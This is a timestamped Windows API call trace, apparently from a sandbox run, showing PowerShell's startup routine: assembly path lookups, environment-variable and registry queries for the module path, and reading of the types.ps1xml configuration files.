	[0402.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.670] SetConsoleCtrlHandler (HandlerRoutine=0x29368dc, Add=1) returned 1
	[0402.689] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0402.690] CoCreateGuid (in: pguid=0xcdab0 | out: pguid=0xcdab0*(Data1=0xf89cf047, Data2=0x5f94, Data3=0x46b2, Data4=([0]=0xb7, [1]=0x40, [2]=0x9e, [3]=0x3, [4]=0xa5, [5]=0x9d, [6]=0xae, [7]=0x5d))) returned 0x0
	[0402.692] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0402.692] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.692] CoTaskMemFree (pv=0x1edb50) 
	[0403.166] WinSqmIsOptedIn () returned 0x0
	[0403.167] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0403.167] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.167] CoTaskMemFree (pv=0x1edb50) 
	[0403.168] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0403.168] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.168] CoTaskMemFree (pv=0x1edb50) 
	[0403.168] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0403.168] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.168] CoTaskMemFree (pv=0x1edb50) 
	[0403.169] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0403.169] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.169] CoTaskMemFree (pv=0x1edb50) 
	[0403.170] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0403.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.170] CoTaskMemFree (pv=0x1edb50) 
	[0403.171] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0403.171] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.171] CoTaskMemFree (pv=0x1edb50) 
	[0403.171] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0403.172] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.172] CoTaskMemFree (pv=0x1edb50) 
	[0403.172] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0403.172] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.172] CoTaskMemFree (pv=0x1edb50) 
	[0403.176] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0403.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.176] CoTaskMemFree (pv=0x1edb50) 
	[0403.188] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0403.188] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.188] CoTaskMemFree (pv=0x1edb50) 
	[0403.188] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0403.188] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.188] CoTaskMemFree (pv=0x1edb50) 
	[0403.189] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0403.189] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.189] CoTaskMemFree (pv=0x1edb50) 
	[0405.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.431] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0405.431] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0405.431] CoTaskMemFree (pv=0x1edb50) 
	[0405.432] CoTaskMemAlloc (cb=0xcc) returned 0x1fb6d0
	[0405.433] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1fb6d0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0405.433] CoTaskMemFree (pv=0x1fb6d0) 
	[0405.433] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd628 | out: phkResult=0xcd628*=0x320) returned 0x0
	[0405.433] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd5ac, lpData=0x0, lpcbData=0xcd5a8*=0x0 | out: lpType=0xcd5ac*=0x2, lpData=0x0, lpcbData=0xcd5a8*=0x6c) returned 0x0
	[0405.433] CoTaskMemAlloc (cb=0x70) returned 0x192530
	[0405.433] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd57c, lpData=0x192530, lpcbData=0xcd578*=0x6c | out: lpType=0xcd57c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xcd578*=0x6c) returned 0x0
	[0405.433] CoTaskMemFree (pv=0x192530) 
	[0405.433] CoTaskMemAlloc (cb=0xcc) returned 0x1fb6d0
	[0405.433] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1fb6d0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0405.433] CoTaskMemFree (pv=0x1fb6d0) 
	[0405.433] CoTaskMemAlloc (cb=0xcc) returned 0x1fb6d0
	[0405.433] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1fb6d0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0405.433] CoTaskMemFree (pv=0x1fb6d0) 
	[0405.809] RegCloseKey (hKey=0x320) returned 0x0
	[0405.809] CoTaskMemAlloc (cb=0xcc) returned 0x1fb6d0
	[0405.809] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1fb6d0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0405.809] CoTaskMemFree (pv=0x1fb6d0) 
	[0405.809] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd628 | out: phkResult=0xcd628*=0x320) returned 0x0
	[0405.810] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd5ac, lpData=0x0, lpcbData=0xcd5a8*=0x0 | out: lpType=0xcd5ac*=0x0, lpData=0x0, lpcbData=0xcd5a8*=0x0) returned 0x2
	[0405.810] RegCloseKey (hKey=0x320) returned 0x0
	[0405.814] CoTaskMemAlloc (cb=0x20c) returned 0x1eb530
	[0405.814] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1eb530 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0405.815] CoTaskMemFree (pv=0x1eb530) 
	[0405.815] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0405.816] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0405.827] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0405.827] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.827] CoTaskMemFree (pv=0x1edb50) 
	[0405.830] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0405.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.830] CoTaskMemFree (pv=0x1edb50) 
	[0405.834] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0405.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.834] CoTaskMemFree (pv=0x1edb50) 
	[0405.834] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0405.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.834] CoTaskMemFree (pv=0x1edb50) 
	[0405.836] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd418 | out: phkResult=0xcd418*=0x328) returned 0x0
	[0405.837] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xcd42c, lpData=0x0, lpcbData=0xcd428*=0x0 | out: lpType=0xcd42c*=0x1, lpData=0x0, lpcbData=0xcd428*=0x74) returned 0x0
	[0405.838] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xcd39c, lpData=0x0, lpcbData=0xcd398*=0x0 | out: lpType=0xcd39c*=0x1, lpData=0x0, lpcbData=0xcd398*=0x74) returned 0x0
	[0405.838] CoTaskMemAlloc (cb=0x78) returned 0x192530
	[0405.838] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xcd36c, lpData=0x192530, lpcbData=0xcd368*=0x74 | out: lpType=0xcd36c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd368*=0x74) returned 0x0
	[0405.838] CoTaskMemFree (pv=0x192530) 
	[0405.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0405.838] SetErrorMode (uMode=0x1) returned 0x1
	[0405.838] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd2f0 | out: lpFileInformation=0xcd2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0405.838] SetErrorMode (uMode=0x1) returned 0x1
	[0405.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0405.841] SetErrorMode (uMode=0x1) returned 0x1
	[0405.841] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd2f0 | out: lpFileInformation=0xcd2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0405.841] SetErrorMode (uMode=0x1) returned 0x1
	[0405.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0405.846] SetErrorMode (uMode=0x1) returned 0x1
	[0405.846] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd2f0 | out: lpFileInformation=0xcd2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0405.846] SetErrorMode (uMode=0x1) returned 0x1
	[0405.850] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0405.850] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.850] CoTaskMemFree (pv=0x1edb50) 
	[0406.233] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0406.233] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0406.233] CoTaskMemFree (pv=0x1edb50) 
	[0406.234] GetACP () returned 0x4e4
	[0406.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0406.243] SetErrorMode (uMode=0x1) returned 0x1
	[0406.244] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0406.245] GetFileType (hFile=0x1c8) returned 0x1
	[0406.245] SetErrorMode (uMode=0x1) returned 0x1
	[0406.245] GetFileType (hFile=0x1c8) returned 0x1
	[0406.248] ReadFile (in: hFile=0x1c8, lpBuffer=0x2dbf4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2dbf4f0*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0406.251] ReadFile (in: hFile=0x1c8, lpBuffer=0x2dbf4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2dbf4f0*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0406.251] ReadFile (in: hFile=0x1c8, lpBuffer=0x2dbf4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2dbf4f0*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0406.251] ReadFile (in: hFile=0x1c8, lpBuffer=0x2dbf4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2dbf4f0*, lpNumberOfBytesRead=0xcd228*=0xcf3, lpOverlapped=0x0) returned 1
	[0406.252] ReadFile (in: hFile=0x1c8, lpBuffer=0x2dbe94b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2dbe94b*, lpNumberOfBytesRead=0xcd228*=0x0, lpOverlapped=0x0) returned 1
	[0406.252] ReadFile (in: hFile=0x1c8, lpBuffer=0x2dbf4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2dbf4f0*, lpNumberOfBytesRead=0xcd228*=0x0, lpOverlapped=0x0) returned 1
	[0406.254] CloseHandle (hObject=0x1c8) returned 1
	[0406.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0406.258] SetErrorMode (uMode=0x1) returned 0x1
